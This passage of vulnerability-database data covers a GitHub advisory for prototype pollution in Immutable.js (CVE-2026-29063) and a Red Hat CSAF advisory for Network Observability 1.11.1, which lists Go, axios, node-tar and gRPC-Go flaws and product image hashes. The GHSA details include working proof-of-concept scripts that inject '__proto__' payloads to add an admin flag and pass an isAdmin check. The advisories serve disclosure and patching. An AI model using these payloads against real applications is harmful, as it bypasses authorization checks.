"fixed": "3.8.3"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-29063"
],
"database_specific": {
"cwe_ids": [
"CWE-1321"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-04T21:28:06Z",
"nvd_published_at": "2026-03-06T19:16:21Z",
"severity": "HIGH"
},
"details": "## Impact\n_What kind of vulnerability is it? Who is impacted?_\n\nA Prototype Pollution is possible in immutable via the mergeDeep(), mergeDeepWith(), merge(), Map.toJS(), and Map.toObject() APIs.\n\n## Affected APIs\n\n| API | Notes |\n| --------------------------------------- | ----------------------------------------------------------- |\n| `mergeDeep(target, source)` | Iterates source keys via `ObjectSeq`, assigns `merged[key]` |\n| `mergeDeepWith(merger, target, source)` | Same code path |\n| `merge(target, source)` | Shallow variant, same assignment logic |\n| `Map.toJS()` | `object[k] = v` in `toObject()` with no `__proto__` guard |\n| `Map.toObject()` | Same `toObject()` implementation |\n| `Map.mergeDeep(source)` | When source is converted to plain object |\n\n\n\n## Patches\n_Has the problem been patched? What versions should users upgrade to?_\n\n| major version | patched version |\n| --- | --- |\n| 3.x | 3.8.3 |\n| 4.x | 4.3.7 |\n| 5.x | 5.1.5 |\n\n## Workarounds\n_Is there a way for users to fix or remediate the vulnerability without upgrading?_\n\n- [Validate user input](https://developer.mozilla.org/en-US/docs/Web/Security/Attacks/Prototype_pollution#validate_user_input)\n- [Node.js flag --disable-proto](https://developer.mozilla.org/en-US/docs/Web/Security/Attacks/Prototype_pollution#node.js_flag_--disable-proto)\n- [Lock down built-in objects](https://developer.mozilla.org/en-US/docs/Web/Security/Attacks/Prototype_pollution#lock_down_built-in_objects)\n- [Avoid lookups on the prototype](https://developer.mozilla.org/en-US/docs/Web/Security/Attacks/Prototype_pollution#avoid_lookups_on_the_prototype)\n- [Create JavaScript objects with null prototype](https://developer.mozilla.org/en-US/docs/Web/Security/Attacks/Prototype_pollution#create_javascript_objects_with_null_prototype)\n\n## Proof of Concept\n\n### PoC 1 \u2014 mergeDeep privilege escalation\n\n```javascript\n\"use strict\";\nconst { mergeDeep } = require(\"immutable\"); // v5.1.4\n\n// Simulates: app merges HTTP request body (JSON) into user profile\nconst userProfile = { id: 1, name: \"Alice\", role: \"user\" };\nconst requestBody = JSON.parse(\n \u0027{\"name\":\"Eve\",\"__proto__\":{\"role\":\"admin\",\"admin\":true}}\u0027,\n);\n\nconst merged = mergeDeep(userProfile, requestBody);\n\nconsole.log(\"merged.name:\", merged.name); // Eve (updated correctly)\nconsole.log(\"merged.role:\", merged.role); // user (own property wins)\nconsole.log(\"merged.admin:\", merged.admin); // true \u2190 INJECTED via __proto__!\n\n// Common security checks \u2014 both bypassed:\nconst isAdminByFlag = (u) =\u003e u.admin === true;\nconst isAdminByRole = (u) =\u003e u.role === \"admin\";\nconsole.log(\"isAdminByFlag:\", isAdminByFlag(merged)); // true \u2190 BYPASSED!\nconsole.log(\"isAdminByRole:\", isAdminByRole(merged)); // false (own role=user wins)\n\n// Stealthy: Object.keys() hides \u0027admin\u0027\nconsole.log(\"Object.keys:\", Object.keys(merged)); // [\u0027id\u0027, \u0027name\u0027, \u0027role\u0027]\n// But property lookup reveals it:\nconsole.log(\"merged.admin:\", merged.admin); // true\n```\n\n### PoC 2 \u2014 All affected APIs\n\n```javascript\n\"use strict\";\nconst { mergeDeep, mergeDeepWith, merge, Map } = require(\"immutable\");\n\nconst payload = JSON.parse(\u0027{\"__proto__\":{\"admin\":true,\"role\":\"superadmin\"}}\u0027);\n\n// 1. mergeDeep\nconst r1 = mergeDeep({ user: \"alice\" }, payload);\nconsole.log(\"mergeDeep admin:\", r1.admin); // true\n\n// 2. mergeDeepWith\nconst r2 = mergeDeepWith((a, b) =\u003e b, { user: \"alice\" }, payload);\nconsole.log(\"mergeDeepWith admin:\", r2.admin); // true\n\n// 3. merge\nconst r3 = merge({ user: \"alice\" }, payload);\nconsole.log(\"merge admin:\", r3.admin); // true\n\n// 4. Map.toJS() with __proto__ key\nconst m = Map({ user: \"alice\" }).set(\"__proto__\", { admin: true });\nconst r4 = m.toJS();\nconsole.log(\"toJS admin:\", r4.admin); // true\n\n// 5. Map.toObject() with __proto__ key\nconst m2 = Map({ user: \"alice\" }).set(\"__proto__\", { admin: true });\nconst r5 = m2.toObject();\nconsole.log(\"toObject admin:\", r5.admin); // true\n\n// 6. Nested path\nconst nested = JSON.parse(\u0027{\"profile\":{\"__proto__\":{\"admin\":true}}}\u0027);\nconst r6 = mergeDeep({ profile: { bio: \"Hello\" } }, nested);\nconsole.log(\"nested admin:\", r6.profile.admin); // true\n\n// 7. Confirm NOT global\nconsole.log(\"({}).admin:\", {}.admin); // undefined (global safe)\n```\n\n**Verified output against immutable@5.1.4:**\n\n```\nmergeDeep admin: true\nmergeDeepWith admin: true\nmerge admin: true\ntoJS admin: true\ntoObject admin: true\nnested admin: true\n({}).admin: undefined \u2190 global Object.prototype NOT polluted\n```\n\n\n## References\n_Are there any links users can visit to find out more?_\n\n- [JavaScript prototype pollution](https://developer.mozilla.org/en-US/docs/Web/Security/Attacks/Prototype_pollution)",
"id": "GHSA-wf6x-7x77-mvgw",
"modified": "2026-03-06T22:51:31Z",
"published": "2026-03-04T21:28:06Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/immutable-js/immutable-js/security/advisories/GHSA-wf6x-7x77-mvgw"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-29063"
},
{
"type": "WEB",
"url": "https://github.com/immutable-js/immutable-js/issues/2178"
},
{
"type": "WEB",
"url": "https://github.com/immutable-js/immutable-js/commit/16b3313fdf2c5f579f10799e22869f6909abf945"
},
{
"type": "WEB",
"url": "https://github.com/immutable-js/immutable-js/commit/6e2cf1cfe6137e72dfa48fc2cfa8f4d399d113f9"
},
{
"type": "WEB",
"url": "https://github.com/immutable-js/immutable-js/commit/6ed4eb626906df788b08019061b292b90bc718cb"
},
{
"type": "PACKAGE",
"url": "https://github.com/immutable-js/immutable-js"
},
{
"type": "WEB",
"url": "https://github.com/immutable-js/immutable-js/releases/tag/v3.8.3"
},
{
"type": "WEB",
"url": "https://github.com/immutable-js/immutable-js/releases/tag/v4.3.8"
},
{
"type": "WEB",
"url": "https://github.com/immutable-js/immutable-js/releases/tag/v5.1.5"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "Immutable is vulnerable to Prototype Pollution"
}
RHSA-2026:6428
Vulnerability from csaf_redhat - Published: 2026-04-02 07:50 - Updated: 2026-04-03 08:06A flaw was found in the net/url package in the Go standard library. The package does not enforce a limit on the number of unique query parameters it parses. A Go application using the net/http.Request.ParseForm method will try to process all parameters provided in the request. A specially crafted HTTP request containing a massive number of query parameters will cause the application to consume an excessive amount of memory, eventually causing the application to crash or become unresponsive, resulting in a denial of service.
A flaw was found in the archive/zip package in the Go standard library. A super-linear file name indexing algorithm is used in the first time a file in an archive is opened. A crafted zip archive containing a specific arrangement of file names can cause an excessive CPU and memory consumption. A Go application processing a malicious archive can become unresponsive or crash, resulting in a denial of service.
A flaw was found in golang. A remote attacker could exploit this vulnerability by providing a specially crafted certificate during the error string construction process within the `HostnameError.Error()` function. This flaw, caused by unbounded string concatenation, leads to excessive resource consumption. Successful exploitation can result in a denial of service (DoS) for the affected system.
During session resumption in crypto/tls, if the underlying Config has its ClientCAs or RootCAs fields mutated between the initial handshake and the resumed handshake, the resumed handshake may succeed when it should have failed. This may happen when a user calls Config.Clone and mutates the returned Config, or uses Config.GetConfigForClient. This can cause a client to resume a session with a server that it would not have resumed with during the initial handshake, or cause a server to resume a session with a client that it would not have resumed with during the initial handshake.
A denial of service flaw has been discovered in the Axios npm package. the mergeConfig function in axios crashes with a TypeError when processing configuration objects containing __proto__ as an own property. An attacker can trigger this by providing a malicious configuration object created via JSON.parse(), causing complete denial of service.
A flaw was found in node-tar. An attacker can craft a malicious archive that, when extracted with default options, creates a hardlink outside the intended extraction directory. This vulnerability allows the attacker to perform arbitrary file read and write operations as the user extracting the archive, bypassing existing path protections. This can lead to unauthorized access and modification of sensitive system files.
A flaw was found in Immutable.js, a library for persistent immutable data structures. This vulnerability, known as Prototype Pollution, allows an attacker with low privileges to inject unwanted properties into core JavaScript object prototypes without user interaction. By manipulating specific APIs such as mergeDeep(), mergeDeepWith(), merge(), Map.toJS(), and Map.toObject(), a remote attacker could potentially execute arbitrary code or cause a denial of service (DoS).
A flaw was found in gRPC-Go, the Go language implementation of gRPC. This vulnerability, an authorization bypass, is caused by improper input validation of the HTTP/2 `:path` pseudo-header. A remote attacker can exploit this by sending raw HTTP/2 frames with a malformed `:path` that omits the mandatory leading slash. This allows the attacker to bypass defined security policies, potentially leading to unauthorized access to services or information disclosure.
| URL | Category | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Network Observability 1.11 for Red Hat OpenShift.",
"title": "Topic"
},
{
"category": "general",
"text": "Network flows collector and monitoring solution.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2026:6428",
"url": "https://access.redhat.com/errata/RHSA-2026:6428"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-61726",
"url": "https://access.redhat.com/security/cve/CVE-2025-61726"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-61728",
"url": "https://access.redhat.com/security/cve/CVE-2025-61728"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-61729",
"url": "https://access.redhat.com/security/cve/CVE-2025-61729"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-68121",
"url": "https://access.redhat.com/security/cve/CVE-2025-68121"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-25639",
"url": "https://access.redhat.com/security/cve/CVE-2026-25639"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-26960",
"url": "https://access.redhat.com/security/cve/CVE-2026-26960"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-29063",
"url": "https://access.redhat.com/security/cve/CVE-2026-29063"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-33186",
"url": "https://access.redhat.com/security/cve/CVE-2026-33186"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/",
"url": "https://access.redhat.com/security/updates/classification/"
},
{
"category": "external",
"summary": "https://docs.openshift.com/container-platform/latest/observability/network_observability/network-observability-operator-release-notes.html",
"url": "https://docs.openshift.com/container-platform/latest/observability/network_observability/network-observability-operator-release-notes.html"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_6428.json"
}
],
"title": "Red Hat Security Advisory: Network Observability 1.11.1 for OpenShift",
"tracking": {
"current_release_date": "2026-04-03T08:06:00+00:00",
"generator": {
"date": "2026-04-03T08:06:00+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.7.4"
}
},
"id": "RHSA-2026:6428",
"initial_release_date": "2026-04-02T07:50:38+00:00",
"revision_history": [
{
"date": "2026-04-02T07:50:38+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2026-04-02T07:50:40+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2026-04-03T08:06:00+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Network Observability (NETOBSERV) 1.11.1",
"product": {
"name": "Network Observability (NETOBSERV) 1.11.1",
"product_id": "Network Observability (NETOBSERV) 1.11.1",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:network_observ_optr:1.11::el9"
}
}
}
],
"category": "product_family",
"name": "Network Observability (NETOBSERV)"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:7e2463af3ff443c98adf0bbfe349c7d9da90c8de34892e41b46627f30623b47a_amd64",
"product": {
"name": "registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:7e2463af3ff443c98adf0bbfe349c7d9da90c8de34892e41b46627f30623b47a_amd64",
"product_id": "registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:7e2463af3ff443c98adf0bbfe349c7d9da90c8de34892e41b46627f30623b47a_amd64",
"product_identification_helper": {
"purl": "pkg:oci/network-observability-flowlogs-pipeline-rhel9@sha256%3A7e2463af3ff443c98adf0bbfe349c7d9da90c8de34892e41b46627f30623b47a?arch=amd64\u0026repository_url=registry.redhat.io/network-observability\u0026tag=1773997913"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:2f23661c41345f7e7625d961649fdc4432e5e9b546ca807dc50c1b685480d44f_amd64",
"product": {
"name": "registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:2f23661c41345f7e7625d961649fdc4432e5e9b546ca807dc50c1b685480d44f_amd64",
"product_id": "registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:2f23661c41345f7e7625d961649fdc4432e5e9b546ca807dc50c1b685480d44f_amd64",
"product_identification_helper": {
"purl": "pkg:oci/network-observability-ebpf-agent-rhel9@sha256%3A2f23661c41345f7e7625d961649fdc4432e5e9b546ca807dc50c1b685480d44f?arch=amd64\u0026repository_url=registry.redhat.io/network-observability\u0026tag=1774887582"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:30a1eceb88756d6bd6b2a523f4c763e2c17491d921e709b49065c8e1827e7e40_amd64",
"product": {
"name": "registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:30a1eceb88756d6bd6b2a523f4c763e2c17491d921e709b49065c8e1827e7e40_amd64",
"product_id": "registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:30a1eceb88756d6bd6b2a523f4c763e2c17491d921e709b49065c8e1827e7e40_amd64",
"product_identification_helper": {
"purl": "pkg:oci/network-observability-cli-rhel9@sha256%3A30a1eceb88756d6bd6b2a523f4c763e2c17491d921e709b49065c8e1827e7e40?arch=amd64\u0026repository_url=registry.redhat.io/network-observability\u0026tag=1773992622"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:40512734417b0b3555046f6034e20dc9d834819bb83dbc2e6240bd656a4b2b3b_amd64",
"product": {
"name": "registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:40512734417b0b3555046f6034e20dc9d834819bb83dbc2e6240bd656a4b2b3b_amd64",
"product_id": "registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:40512734417b0b3555046f6034e20dc9d834819bb83dbc2e6240bd656a4b2b3b_amd64",
"product_identification_helper": {
"purl": "pkg:oci/network-observability-console-plugin-compat-rhel9@sha256%3A40512734417b0b3555046f6034e20dc9d834819bb83dbc2e6240bd656a4b2b3b?arch=amd64\u0026repository_url=registry.redhat.io/network-observability\u0026tag=1774431392"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:3452169eaaeda28a490561e93089374a5e306868e221f68c14dc623de532f152_amd64",
"product": {
"name": "registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:3452169eaaeda28a490561e93089374a5e306868e221f68c14dc623de532f152_amd64",
"product_id": "registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:3452169eaaeda28a490561e93089374a5e306868e221f68c14dc623de532f152_amd64",
"product_identification_helper": {
"purl": "pkg:oci/network-observability-console-plugin-rhel9@sha256%3A3452169eaaeda28a490561e93089374a5e306868e221f68c14dc623de532f152?arch=amd64\u0026repository_url=registry.redhat.io/network-observability\u0026tag=1774431617"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/network-observability/network-observability-operator-bundle@sha256:325f2d9688ef540088f75b450d209fb8dd6b7b2dfc006f492f7575f3e8678607_amd64",
"product": {
"name": "registry.redhat.io/network-observability/network-observability-operator-bundle@sha256:325f2d9688ef540088f75b450d209fb8dd6b7b2dfc006f492f7575f3e8678607_amd64",
"product_id": "registry.redhat.io/network-observability/network-observability-operator-bundle@sha256:325f2d9688ef540088f75b450d209fb8dd6b7b2dfc006f492f7575f3e8678607_amd64",
"product_identification_helper": {
"purl": "pkg:oci/network-observability-operator-bundle@sha256%3A325f2d9688ef540088f75b450d209fb8dd6b7b2dfc006f492f7575f3e8678607?arch=amd64\u0026repository_url=registry.redhat.io/network-observability\u0026tag=1774962696"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:13ea96ec33fe631eea4970b4d05aaebb101d1e964047cc3cdd8e659eb1329122_amd64",
"product": {
"name": "registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:13ea96ec33fe631eea4970b4d05aaebb101d1e964047cc3cdd8e659eb1329122_amd64",
"product_id": "registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:13ea96ec33fe631eea4970b4d05aaebb101d1e964047cc3cdd8e659eb1329122_amd64",
"product_identification_helper": {
"purl": "pkg:oci/network-observability-rhel9-operator@sha256%3A13ea96ec33fe631eea4970b4d05aaebb101d1e964047cc3cdd8e659eb1329122?arch=amd64\u0026repository_url=registry.redhat.io/network-observability\u0026tag=1774859742"
}
}
}
],
"category": "architecture",
"name": "amd64"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:5218256abd119c47e49511a207521013f4e70873f5e1695cd33c7acb236167a3_arm64",
"product": {
"name": "registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:5218256abd119c47e49511a207521013f4e70873f5e1695cd33c7acb236167a3_arm64",
"product_id": "registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:5218256abd119c47e49511a207521013f4e70873f5e1695cd33c7acb236167a3_arm64",
"product_identification_helper": {
"purl": "pkg:oci/network-observability-flowlogs-pipeline-rhel9@sha256%3A5218256abd119c47e49511a207521013f4e70873f5e1695cd33c7acb236167a3?arch=arm64\u0026repository_url=registry.redhat.io/network-observability\u0026tag=1773997913"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:dc9c1e367526c7a2bae9694c253909f6716be82f89d1ceb9dc3a38528120d518_arm64",
"product": {
"name": "registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:dc9c1e367526c7a2bae9694c253909f6716be82f89d1ceb9dc3a38528120d518_arm64",
"product_id": "registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:dc9c1e367526c7a2bae9694c253909f6716be82f89d1ceb9dc3a38528120d518_arm64",
"product_identification_helper": {
"purl": "pkg:oci/network-observability-ebpf-agent-rhel9@sha256%3Adc9c1e367526c7a2bae9694c253909f6716be82f89d1ceb9dc3a38528120d518?arch=arm64\u0026repository_url=registry.redhat.io/network-observability\u0026tag=1774887582"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:05ced6a12abb5c6156d57cde83a5515f1ba1ae4b4876c20df8e87acf658b55cd_arm64",
"product": {
"name": "registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:05ced6a12abb5c6156d57cde83a5515f1ba1ae4b4876c20df8e87acf658b55cd_arm64",
"product_id": "registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:05ced6a12abb5c6156d57cde83a5515f1ba1ae4b4876c20df8e87acf658b55cd_arm64",
"product_identification_helper": {
"purl": "pkg:oci/network-observability-cli-rhel9@sha256%3A05ced6a12abb5c6156d57cde83a5515f1ba1ae4b4876c20df8e87acf658b55cd?arch=arm64\u0026repository_url=registry.redhat.io/network-observability\u0026tag=1773992622"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:115254a3a9f613fbcec875c7e515b638da1e046f6dff8bcb0ce8aeb7bd3bcbb8_arm64",
"product": {
"name": "registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:115254a3a9f613fbcec875c7e515b638da1e046f6dff8bcb0ce8aeb7bd3bcbb8_arm64",
"product_id": "registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:115254a3a9f613fbcec875c7e515b638da1e046f6dff8bcb0ce8aeb7bd3bcbb8_arm64",
"product_identification_helper": {
"purl": "pkg:oci/network-observability-console-plugin-compat-rhel9@sha256%3A115254a3a9f613fbcec875c7e515b638da1e046f6dff8bcb0ce8aeb7bd3bcbb8?arch=arm64\u0026repository_url=registry.redhat.io/network-observability\u0026tag=1774431392"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:1b0ed12930e073b9d9f10856abd1bf78366123a7c46d0365395ae9ffaccb8cd1_arm64",
"product": {
"name": "registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:1b0ed12930e073b9d9f10856abd1bf78366123a7c46d0365395ae9ffaccb8cd1_arm64",
"product_id": "registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:1b0ed12930e073b9d9f10856abd1bf78366123a7c46d0365395ae9ffaccb8cd1_arm64",
"product_identification_helper": {
"purl": "pkg:oci/network-observability-console-plugin-rhel9@sha256%3A1b0ed12930e073b9d9f10856abd1bf78366123a7c46d0365395ae9ffaccb8cd1?arch=arm64\u0026repository_url=registry.redhat.io/network-observability\u0026tag=1774431617"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:4a717354ce0dfefb859c61b6088f9e51c9e1679892359ddcbe250697e723618d_arm64",
"product": {
"name": "registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:4a717354ce0dfefb859c61b6088f9e51c9e1679892359ddcbe250697e723618d_arm64",
"product_id": "registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:4a717354ce0dfefb859c61b6088f9e51c9e1679892359ddcbe250697e723618d_arm64",
"product_identification_helper": {
"purl": "pkg:oci/network-observability-rhel9-operator@sha256%3A4a717354ce0dfefb859c61b6088f9e51c9e1679892359ddcbe250697e723618d?arch=arm64\u0026repository_url=registry.redhat.io/network-observability\u0026tag=1774859742"
}
}
}
],
"category": "architecture",
"name": "arm64"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:791b6dff77ede837fe03220d73511632b719e3c9668ef1a4a7766c2c9c8fe4b4_ppc64le",
"product": {
"name": "registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:791b6dff77ede837fe03220d73511632b719e3c9668ef1a4a7766c2c9c8fe4b4_ppc64le",
"product_id": "registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:791b6dff77ede837fe03220d73511632b719e3c9668ef1a4a7766c2c9c8fe4b4_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/network-observability-flowlogs-pipeline-rhel9@sha256%3A791b6dff77ede837fe03220d73511632b719e3c9668ef1a4a7766c2c9c8fe4b4?arch=ppc64le\u0026repository_url=registry.redhat.io/network-observability\u0026tag=1773997913"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:9d6bc518588793ff607a20fd94a181c7028c1f7a938b713253bfddef3fbac708_ppc64le",
"product": {
"name": "registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:9d6bc518588793ff607a20fd94a181c7028c1f7a938b713253bfddef3fbac708_ppc64le",
"product_id": "registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:9d6bc518588793ff607a20fd94a181c7028c1f7a938b713253bfddef3fbac708_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/network-observability-ebpf-agent-rhel9@sha256%3A9d6bc518588793ff607a20fd94a181c7028c1f7a938b713253bfddef3fbac708?arch=ppc64le\u0026repository_url=registry.redhat.io/network-observability\u0026tag=1774887582"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:b0f982a4b0cf36578c2483d9487e6c6f0343043737e01b6dd1b61778ed915e80_ppc64le",
"product": {
"name": "registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:b0f982a4b0cf36578c2483d9487e6c6f0343043737e01b6dd1b61778ed915e80_ppc64le",
"product_id": "registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:b0f982a4b0cf36578c2483d9487e6c6f0343043737e01b6dd1b61778ed915e80_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/network-observability-cli-rhel9@sha256%3Ab0f982a4b0cf36578c2483d9487e6c6f0343043737e01b6dd1b61778ed915e80?arch=ppc64le\u0026repository_url=registry.redhat.io/network-observability\u0026tag=1773992622"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:03f45691cb47a4afd19a4bb61704f1c38cc6f0fb9f7bcacf4ed3070eecdc02b4_ppc64le",
"product": {
"name": "registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:03f45691cb47a4afd19a4bb61704f1c38cc6f0fb9f7bcacf4ed3070eecdc02b4_ppc64le",
"product_id": "registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:03f45691cb47a4afd19a4bb61704f1c38cc6f0fb9f7bcacf4ed3070eecdc02b4_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/network-observability-console-plugin-compat-rhel9@sha256%3A03f45691cb47a4afd19a4bb61704f1c38cc6f0fb9f7bcacf4ed3070eecdc02b4?arch=ppc64le\u0026repository_url=registry.redhat.io/network-observability\u0026tag=1774431392"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:222e5ccbdcee7fcddfceda87216a63ea8aa46efdde0171fd1ba58b5c1e020768_ppc64le",
"product": {
"name": "registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:222e5ccbdcee7fcddfceda87216a63ea8aa46efdde0171fd1ba58b5c1e020768_ppc64le",
"product_id": "registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:222e5ccbdcee7fcddfceda87216a63ea8aa46efdde0171fd1ba58b5c1e020768_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/network-observability-console-plugin-rhel9@sha256%3A222e5ccbdcee7fcddfceda87216a63ea8aa46efdde0171fd1ba58b5c1e020768?arch=ppc64le\u0026repository_url=registry.redhat.io/network-observability\u0026tag=1774431617"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:b5778b60be17f7e849b5aff93df89735063e003c27c61bc03abd4b899542a7ae_ppc64le",
"product": {
"name": "registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:b5778b60be17f7e849b5aff93df89735063e003c27c61bc03abd4b899542a7ae_ppc64le",
"product_id": "registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:b5778b60be17f7e849b5aff93df89735063e003c27c61bc03abd4b899542a7ae_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/network-observability-rhel9-operator@sha256%3Ab5778b60be17f7e849b5aff93df89735063e003c27c61bc03abd4b899542a7ae?arch=ppc64le\u0026repository_url=registry.redhat.io/network-observability\u0026tag=1774859742"
}
}
}
